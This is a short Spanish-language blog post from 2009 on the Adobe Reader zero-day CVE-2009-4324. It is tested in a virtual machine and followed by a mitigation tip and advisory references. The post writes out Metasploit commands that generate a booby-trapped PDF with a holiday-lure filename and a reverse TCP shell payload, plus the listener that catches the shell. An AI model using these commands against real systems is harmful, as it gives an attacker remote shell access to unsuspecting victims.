jueves, 17 de diciembre de 2009

Explotando el 0-day de Adobe Reader

El Lunes 14, Adobe alerto a sus usuarios que se estaba explotando activamente una vulnerabilidad para la última versión de Adobe Reader y Acrobat.

El Martes 15, Adobe anunció a todos sus usuarios que van a continuar desprotegidos hasta el 12 de Enero del 2010, cuando salga el parche de seguridad.

El Martes 15, H.D. Moore anunció vía Twitter que ya se encontraba disponible el exploit para el 0-day de Adobe en MetaSploit.

Probé el exploit de MetaSploit en una máquina virtual con Windows XP y la ultima versión de Adobe Reader (9.2) y anduvo muy bien, solamente tuve que aumentarle la memoria a 1GB de RAM, de lo contrario no me funcionaba.

# creo el archivo .pdf en MetaSploit
./msfconsole
use exploit/windows/fileformat/adobe_media_newplayer
set FILENAME feliz_navidad.pdf
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.10.109
exploit

# dejo escuchando por la conexión reversa
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.10.109 E

Solución: deshabilitar JavaScript en Adobe.


FUENTES:
- Security Advisory for Adobe Reader and Acrobat
- CVE-2009-4324
- Bugtraq ID: 37331
- Adobe PSIRT

1 comentario:

Walt3r dijo...

Solucion #2: Usar Linux :)

LinkWithin